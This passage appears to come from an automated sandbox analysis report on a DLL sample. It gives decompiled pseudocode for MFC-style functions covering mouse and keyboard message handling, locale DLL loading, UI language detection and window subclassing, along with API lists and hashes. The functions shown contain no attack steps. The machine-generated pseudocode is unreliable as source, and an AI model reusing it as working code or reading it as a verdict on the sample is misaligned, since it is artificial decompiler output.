                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 100259F6
                                                                                                            • FindClose.KERNEL32(00000000), ref: 10025A02
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10025A1F
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 10025A3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4080879615-0
                                                                                                            • Opcode ID: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                                                            • Instruction ID: 1fd06765c8897f0dc9d05cfa7245a04573121f8266c58d07b0a106865c59afd7
                                                                                                            • Opcode Fuzzy Hash: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                                                            • Instruction Fuzzy Hash: E531B271900168EFDB11CFA0DC88EEEBBBCEF45396F404266F406DA151D7319E848B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002FE1B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 164keyboardtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 81%
                                                                                                            			E1002FE1B(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				struct tagPOINT _v28;
				intOrPtr _v40;
				signed char _v69;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t62;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t77;
				short _t78;
				short _t85;
				short _t90;
				intOrPtr _t109;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr* _t116;

				_t113 = _a4;
				_t116 = __ecx;
				if(E10020B0B(__ecx, _t113) != 0) {
					L37:
					return 1;
				}
				_t114 =  *((intOrPtr*)(_t113 + 4));
				_v20 = E10008325(__ecx);
				if(( *(__ecx + 0x7c) & 0x00000020) != 0 || _t114 == 0x201 || _t114 == 0x202) {
					if(_t114 < 0x200 || _t114 > 0x209) {
						if(_t114 < 0xa0 || _t114 > 0xa9) {
							goto L30;
						} else {
							goto L8;
						}
					} else {
						L8:
						_v16 = E100373DB();
						_t70 = _a4;
						_v28.y =  *((intOrPtr*)(_t70 + 0x18));
						_v28.x =  *(_t70 + 0x14);
						ScreenToClient( *(_t116 + 0x1c),  &_v28);
						E10011C50( &_v76, 0, 0x30);
						_v76 = 0x28;
						_t77 =  *((intOrPtr*)( *_t116 + 0x6c))(_v28.x, _v28.y,  &_v76);
						_t128 = _v40 - 0xffffffff;
						_v8 = _t77;
						if(_v40 != 0xffffffff) {
							_push(_v40);
							E100107C8(0x201, _t114, _t116, _t128);
						}
						if(_t114 != 0x201 || (_v69 & 0x00000080) == 0) {
							_v12 = _v12 & 0x00000000;
							__eflags = _t114 - 0x201;
							if(_t114 != 0x201) {
								_t90 = GetKeyState(1);
								__eflags = _t90;
								if(_t90 < 0) {
									_v8 =  *((intOrPtr*)(_v16 + 0x78));
								}
							}
						} else {
							_v12 = 1;
						}
						if(_v8 < 0 || _v12 != 0) {
							_t78 = GetKeyState(1);
							__eflags = _t78;
							if(_t78 >= 0) {
								L28:
								 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
								KillTimer( *(_t116 + 0x1c), 0xe001);
								goto L29;
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L29;
							}
							goto L28;
						} else {
							if(_t114 != 0x202) {
								__eflags =  *(_t116 + 0x78) & 0x00000008;
								if(( *(_t116 + 0x78) & 0x00000008) != 0) {
									L25:
									 *((intOrPtr*)( *_t116 + 0x160))(_v8);
									L29:
									 *((intOrPtr*)(_v16 + 0x78)) = _v8;
									goto L30;
								}
								_t85 = GetKeyState(1);
								__eflags = _t85;
								if(_t85 < 0) {
									goto L25;
								}
								_t109 = _v16;
								__eflags = _v8 -  *((intOrPtr*)(_t109 + 0x78));
								if(_v8 ==  *((intOrPtr*)(_t109 + 0x78))) {
									goto L29;
								}
								_push(0x12c);
								_push(0xe000);
								L24:
								E1002F4CC(_t116);
								goto L29;
							}
							 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
							_push(0xc8);
							_push(0xe001);
							goto L24;
						}
					}
				} else {
					L30:
					_t62 = E10022AD5(_t116);
					if(_t62 == 0 ||  *((intOrPtr*)(_t62 + 0x64)) == 0) {
						if(_v20 == 0) {
							L35:
							if(IsWindow( *(_t116 + 0x1c)) == 0) {
								goto L38;
							}
							return E10021527(_a4);
						} else {
							goto L33;
						}
						while(1) {
							L33:
							_t115 = _v20;
							_push(_a4);
							if( *((intOrPtr*)( *_v20 + 0x100))() != 0) {
								goto L37;
							}
							_t68 = E10022A96(_t115);
							_v20 = _t68;
							if(_t68 != 0) {
								continue;
							}
							goto L35;
						}
						goto L37;
					} else {
						L38:
						__eflags = 0;
						return 0;
					}
				}
			}

























                                                                                                            0x1002fe23
                                                                                                            0x1002fe27
                                                                                                            0x1002fe30
                                                                                                            0x1003000b
                                                                                                            0x00000000
                                                                                                            0x1003000d
                                                                                                            0x1002fe36
                                                                                                            0x1002fe45
                                                                                                            0x1002fe4d
                                                                                                            0x1002fe65
                                                                                                            0x1002fe75
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002fe87
                                                                                                            0x1002fe87
                                                                                                            0x1002fe8c
                                                                                                            0x1002fe8f
                                                                                                            0x1002fe98
                                                                                                            0x1002fea2
                                                                                                            0x1002fea5
                                                                                                            0x1002feb3
                                                                                                            0x1002fec9
                                                                                                            0x1002fed0
                                                                                                            0x1002fed3
                                                                                                            0x1002fed7
                                                                                                            0x1002feda
                                                                                                            0x1002fedc
                                                                                                            0x1002fedf
                                                                                                            0x1002fee4
                                                                                                            0x1002fee7
                                                                                                            0x1002fef8
                                                                                                            0x1002fefc
                                                                                                            0x1002fefe
                                                                                                            0x1002ff02
                                                                                                            0x1002ff08
                                                                                                            0x1002ff0b
                                                                                                            0x1002ff13
                                                                                                            0x1002ff13
                                                                                                            0x1002ff0b
                                                                                                            0x1002feef
                                                                                                            0x1002feef
                                                                                                            0x1002feef
                                                                                                            0x1002ff1a
                                                                                                            0x1002ff84
                                                                                                            0x1002ff8a
                                                                                                            0x1002ff8d
                                                                                                            0x1002ff95
                                                                                                            0x1002ff9b
                                                                                                            0x1002ffa9
                                                                                                            0x00000000
                                                                                                            0x1002ffa9
                                                                                                            0x1002ff8f
                                                                                                            0x1002ff93
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ff22
                                                                                                            0x1002ff28
                                                                                                            0x1002ff42
                                                                                                            0x1002ff46
                                                                                                            0x1002ff73
                                                                                                            0x1002ff7a
                                                                                                            0x1002ffaf
                                                                                                            0x1002ffb5
                                                                                                            0x00000000
                                                                                                            0x1002ffb5
                                                                                                            0x1002ff4a
                                                                                                            0x1002ff50
                                                                                                            0x1002ff53
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ff58
                                                                                                            0x1002ff5b
                                                                                                            0x1002ff5e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ff60
                                                                                                            0x1002ff65
                                                                                                            0x1002ff6a
                                                                                                            0x1002ff6c
                                                                                                            0x00000000
                                                                                                            0x1002ff6c
                                                                                                            0x1002ff30
                                                                                                            0x1002ff36
                                                                                                            0x1002ff3b
                                                                                                            0x00000000
                                                                                                            0x1002ff3b
                                                                                                            0x1002ff1a
                                                                                                            0x1002ffb8
                                                                                                            0x1002ffb8
                                                                                                            0x1002ffba
                                                                                                            0x1002ffc2
                                                                                                            0x1002ffce
                                                                                                            0x1002fff2
                                                                                                            0x1002fffd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ffd0
                                                                                                            0x1002ffd0
                                                                                                            0x1002ffd0
                                                                                                            0x1002ffd3
                                                                                                            0x1002ffe2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002ffe6
                                                                                                            0x1002ffed
                                                                                                            0x1002fff0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002fff0
                                                                                                            0x00000000
                                                                                                            0x10030010
                                                                                                            0x10030010
                                                                                                            0x10030010
                                                                                                            0x00000000
                                                                                                            0x10030010
                                                                                                            0x1002ffc2

                                                                                                            APIs
                                                                                                              • Part of subcall function 10008325: GetParent.USER32(?), ref: 1000832F
                                                                                                            • ScreenToClient.USER32 ref: 1002FEA5
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002FF02
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002FF4A
                                                                                                            • GetKeyState.USER32(00000001), ref: 1002FF84
                                                                                                            • KillTimer.USER32(?,0000E001), ref: 1002FFA9
                                                                                                            • IsWindow.USER32(?), ref: 1002FFF5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: State$ClientKillParentScreenTimerWindow
                                                                                                            • String ID: (
                                                                                                            • API String ID: 1540673551-3887548279
                                                                                                            • Opcode ID: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                                                            • Instruction ID: 52046703db0e3be90f8dc11269cbd7e61114aefd04d05f62ac3939d045805729
                                                                                                            • Opcode Fuzzy Hash: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                                                            • Instruction Fuzzy Hash: E4519E35A00249DFDB51DFA4D988BADBBF1EF48390F51007DE915AB2E2D7709A81CB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10032A2D Relevance: 10.6, APIs: 7, Instructions: 67windowkeyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E10032A2D(void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t24;
				void* _t29;
				int _t32;
				struct HWND__* _t36;

				_push(__ecx);
				_t29 = __ecx;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t36 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t36 != 0) {
					_t32 = _a4 << 0x10;
					do {
						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
						_t36 = GetParent(_t36);
					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
				} else {
					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t24;
			}








                                                                                                            0x10032a30
                                                                                                            0x10032a3c
                                                                                                            0x10032a43
                                                                                                            0x10032a45
                                                                                                            0x10032a47
                                                                                                            0x10032a47
                                                                                                            0x10032a53
                                                                                                            0x10032a55
                                                                                                            0x10032a57
                                                                                                            0x10032a57
                                                                                                            0x10032a64
                                                                                                            0x10032a6e
                                                                                                            0x10032a71
                                                                                                            0x10032a9d
                                                                                                            0x10032a9f
                                                                                                            0x10032ab0
                                                                                                            0x10032aba
                                                                                                            0x10032aba
                                                                                                            0x10032a73
                                                                                                            0x10032a90
                                                                                                            0x10032a90
                                                                                                            0x10032acd

                                                                                                            APIs
                                                                                                            • GetKeyState.USER32(00000011), ref: 10032A3E
                                                                                                            • GetKeyState.USER32(00000010), ref: 10032A4E
                                                                                                            • GetFocus.USER32 ref: 10032A5E
                                                                                                            • GetDesktopWindow.USER32 ref: 10032A66
                                                                                                            • SendMessageA.USER32(?,0000020A,?,?), ref: 10032A8A
                                                                                                            • SendMessageA.USER32(00000000,0000020A,?,?), ref: 10032AA9
                                                                                                            • GetParent.USER32(00000000), ref: 10032AB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendState$DesktopFocusParentWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 4150626516-0
                                                                                                            • Opcode ID: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                                                            • Instruction ID: b978b154d262d257bd1bf3691abd3912275a9b299a299c021808da74b3d9ae9a
                                                                                                            • Opcode Fuzzy Hash: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                                                            • Instruction Fuzzy Hash: BD11CA32A00B39BFE7629BA68C84E593B98EB44792F114425FE41DF141D6B0EC41D7B1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100348C4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43librarystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E100348C4(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				char _v284;
				intOrPtr _t10;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;

				_t22 = __esi;
				_t20 = __ecx;
				_t19 = __ebx;
				_t27 = _a8 - 0x800;
				_t10 =  *0x1004c470; // 0x6edecb8c
				_v8 = _t10;
				if(_a8 != 0x800) {
					__eflags = GetLocaleInfoA(_a8, 3,  &_a8, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					lstrcpyA( &_a8, "LOC");
					L2:
					_push(_t22);
					_t15 = E10011D44(_t19, _t20, _t27,  &_v284, 0x112, _a4,  &_a8);
					if(_t15 == 0xffffffff || _t15 >= 0x112) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
				}
				return E100117AE(_t12, _v8);
			}










                                                                                                            0x100348c4
                                                                                                            0x100348c4
                                                                                                            0x100348c4
                                                                                                            0x100348cd
                                                                                                            0x100348d4
                                                                                                            0x100348d9
                                                                                                            0x100348df
                                                                                                            0x10034930
                                                                                                            0x10034932
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034934
                                                                                                            0x100348e1
                                                                                                            0x100348e7
                                                                                                            0x100348ed
                                                                                                            0x100348ed
                                                                                                            0x10034902
                                                                                                            0x1003490d
                                                                                                            0x10034936
                                                                                                            0x10034936
                                                                                                            0x10034913
                                                                                                            0x1003491a
                                                                                                            0x1003491a
                                                                                                            0x10034938
                                                                                                            0x10034942

                                                                                                            APIs
                                                                                                            • lstrcpyA.KERNEL32(00000800,LOC), ref: 100348E7
                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 1003491A
                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 1003492A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLibraryLoadLocalelstrcpy
                                                                                                            • String ID: LOC
                                                                                                            • API String ID: 864663389-519433814
                                                                                                            • Opcode ID: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                                                            • Instruction ID: 1b661f8c901bfcf78996fae171bebb1d1a637ee772a53719b66f99f2a01cec23
                                                                                                            • Opcode Fuzzy Hash: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                                                            • Instruction Fuzzy Hash: 6C018B3990111CAFEB62DFA0DC49EDE37ACEB00326F018562FA15DE190DB30EA448B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10034959 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 167registrylibraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E10034959(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				void* _v28;
				void* _v32;
				int _v36;
				int _v40;
				signed short _v44;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				intOrPtr _t42;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				struct HINSTANCE__* _t46;
				void* _t47;
				signed int _t50;
				signed short _t65;
				signed int _t66;
				int _t70;
				signed short _t71;
				signed int _t72;
				signed short _t78;
				signed int _t79;
				char* _t85;
				int _t87;
				signed int _t95;
				signed int _t99;
				int _t100;
				int _t101;
				void* _t105;
				void* _t109;

				_t42 =  *0x1004c470; // 0x6edecb8c
				_t85 = 0;
				_v8 = _t42;
				_v28 = 0;
				_t43 = GetModuleHandleA("kernel32.dll");
				_v36 = _t43;
				_t44 = GetProcAddress(_t43, "GetUserDefaultUILanguage");
				if(_t44 == 0) {
					if(GetVersion() >= 0) {
						_t46 = GetModuleHandleA("ntdll.dll");
						if(_t46 == 0) {
							L13:
							 *((intOrPtr*)(_t109 + 0xffffffffffffffc4)) = 0x800;
							_t105 = 1;
							_t99 = 0;
							if(1 <= _t85) {
								L16:
								_t47 = 0;
								L17:
								return E100117AE(_t47, _v8);
							} else {
								goto L14;
							}
							while(1) {
								L14:
								_t47 = E100348C4(_t85, _t88, _t105, _a4,  *((intOrPtr*)(_t109 + _t99 * 4 - 0x3c)));
								_pop(_t88);
								if(_t47 != _t85) {
									goto L17;
								}
								_t99 =  &(1[_t99]);
								if(_t99 < _t105) {
									continue;
								}
								goto L16;
							}
							goto L17;
						}
						_t88 =  &_v28;
						_v28 = 0;
						EnumResourceLanguagesA(_t46, 0x10, 1, 0x10034943,  &_v28);
						if(_v28 == 0) {
							goto L13;
						}
						_t50 = _v28 & 0x0000ffff;
						_t88 = _t50 & 0x000003ff;
						_t100 = _t50 & 0x3ff;
						_v64 = ConvertDefaultLocale(_t50 & 0x0000fc00 | _t100);
						_v60 = ConvertDefaultLocale(_t100);
						_push(2);
						L12:
						_pop(0);
						goto L13;
					}
					_v32 = 0;
					if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v32) == 0) {
						_v36 = 0x10;
						if(RegQueryValueExA(_v32, 0, 0,  &_v40,  &_v24,  &_v36) == 0 && _v40 == 1 && E10011D9B(0, GetModuleHandleA, 0,  &_v24, "%x",  &_v44) == 1) {
							_t65 = _v44;
							_v28 = _t65;
							_t66 = _t65 & 0x0000ffff;
							_t88 = _t66 & 0x000003ff;
							_t101 = _t66 & 0x3ff;
							_v64 = ConvertDefaultLocale(_t66 & 0x0000fc00 | _t101);
							_t70 = ConvertDefaultLocale(_t101);
							_push(2);
							_v60 = _t70;
							_pop(0);
						}
						RegCloseKey(_v32);
					}
					goto L13;
				}
				_t71 =  *_t44();
				_v28 = _t71;
				_t72 = _t71 & 0x0000ffff;
				_t95 = _t72 & 0x3ff;
				_v32 = _t95;
				_v64 = ConvertDefaultLocale(_t72 & 0x0000fc00 | _t95);
				_v60 = ConvertDefaultLocale(_v32);
				_t78 =  *(GetProcAddress(_v36, "GetSystemDefaultUILanguage"))();
				_v28 = _t78;
				_t79 = _t78 & 0x0000ffff;
				_t88 = _t79 & 0x000003ff;
				_t87 = _t79 & 0x3ff;
				_v56 = ConvertDefaultLocale(_t79 & 0x0000fc00 | _t87);
				_v52 = ConvertDefaultLocale(_t87);
				_push(4);
				_t85 = 0;
				goto L12;
			}



































                                                                                                            0x1003495f
                                                                                                            0x1003496d
                                                                                                            0x10034974
                                                                                                            0x10034977
                                                                                                            0x1003497c
                                                                                                            0x10034984
                                                                                                            0x10034987
                                                                                                            0x1003498f
                                                                                                            0x10034a03
                                                                                                            0x10034ab0
                                                                                                            0x10034ab4
                                                                                                            0x10034afe
                                                                                                            0x10034afe
                                                                                                            0x10034b06
                                                                                                            0x10034b07
                                                                                                            0x10034b0b
                                                                                                            0x10034b24
                                                                                                            0x10034b24
                                                                                                            0x10034b26
                                                                                                            0x10034b32
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034b0d
                                                                                                            0x10034b0d
                                                                                                            0x10034b14
                                                                                                            0x10034b1c
                                                                                                            0x10034b1d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034b1f
                                                                                                            0x10034b22
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034b22
                                                                                                            0x00000000
                                                                                                            0x10034b0d
                                                                                                            0x10034ab6
                                                                                                            0x10034ac4
                                                                                                            0x10034ac7
                                                                                                            0x10034ad1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034ad3
                                                                                                            0x10034adf
                                                                                                            0x10034ae5
                                                                                                            0x10034af3
                                                                                                            0x10034af8
                                                                                                            0x10034afb
                                                                                                            0x10034afd
                                                                                                            0x10034afd
                                                                                                            0x00000000
                                                                                                            0x10034afd
                                                                                                            0x10034a1d
                                                                                                            0x10034a28
                                                                                                            0x10034a3f
                                                                                                            0x10034a4e
                                                                                                            0x10034a70
                                                                                                            0x10034a79
                                                                                                            0x10034a7c
                                                                                                            0x10034a81
                                                                                                            0x10034a87
                                                                                                            0x10034a95
                                                                                                            0x10034a98
                                                                                                            0x10034a9a
                                                                                                            0x10034a9c
                                                                                                            0x10034a9f
                                                                                                            0x10034a9f
                                                                                                            0x10034aa3
                                                                                                            0x10034aa3
                                                                                                            0x00000000
                                                                                                            0x10034a28
                                                                                                            0x10034991
                                                                                                            0x100349a3
                                                                                                            0x100349a6
                                                                                                            0x100349ad
                                                                                                            0x100349b5
                                                                                                            0x100349bd
                                                                                                            0x100349ca
                                                                                                            0x100349d3
                                                                                                            0x100349d5
                                                                                                            0x100349d8
                                                                                                            0x100349dd
                                                                                                            0x100349df
                                                                                                            0x100349ea
                                                                                                            0x100349ef
                                                                                                            0x100349f2
                                                                                                            0x100349f4
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                                                            • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                                                            • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                                                            • GetVersion.KERNEL32 ref: 100349FB
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10034A20
                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10034A46
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10034A92
                                                                                                            • ConvertDefaultLocale.KERNEL32(76EC4DE0), ref: 10034A98
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10034AA3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                            • API String ID: 780041395-483790700
                                                                                                            • Opcode ID: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                                                            • Instruction ID: 7cfe531e2014ce0a7197dcc2f573d90a24e44201c953dd79459b2257b218328e
                                                                                                            • Opcode Fuzzy Hash: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                                                            • Instruction Fuzzy Hash: 00515F75D0022DAFDB12DFE6DC85AEFBBF8EB48355F11442AE501EB140DB7899409BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100235CF Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 167stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E100235CF(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
				intOrPtr _v8;
				char _v16;
				char _v17;
				char _v272;
				struct _WNDCLASSEXA _v320;
				void* __ebp;
				intOrPtr _t52;
				signed int _t56;
				char _t58;
				long _t60;
				int _t71;
				long _t81;
				CHAR* _t83;
				void* _t90;
				void* _t99;
				long* _t102;
				signed int _t104;
				long _t105;
				CHAR* _t107;
				int _t108;

				_t52 =  *0x1004c470; // 0x6edecb8c
				_push(0x100347fd);
				_v8 = _t52;
				_t90 = E10037855(0x1004efe8);
				if(_a4 == 3) {
					_t104 =  *(_t90 + 0x14);
					_push(__edi);
					_t99 =  *_a12;
					_t56 =  *(E100373B5() + 0x14) & 0x000000ff;
					_a4 = _t56;
					if(_t104 != 0 || ( *(_t99 + 0x23) & 0x00000040) == 0 && _t56 == 0) {
						if( *0x1004f354 == 0) {
							L10:
							if(_t104 == 0) {
								if( *0x1004ef68 != 0) {
									L16:
									if(GetClassLongA(_a8, 0xffffffe0) !=  *0x1004ef68) {
										L20:
										_t58 = GetWindowLongA(_a8, 0xfffffffc);
										_v16 = _t58;
										if(_t58 != 0) {
											_t107 = "AfxOldWndProc423";
											if(GetPropA(_a8, _t107) == 0) {
												SetPropA(_a8, _t107, _v16);
												if(GetPropA(_a8, _t107) == _v16) {
													GlobalAddAtomA(_t107);
													SetWindowLongA(_a8, 0xfffffffc, 0x10023477);
												}
											}
										}
										goto L24;
									}
									goto L24;
								}
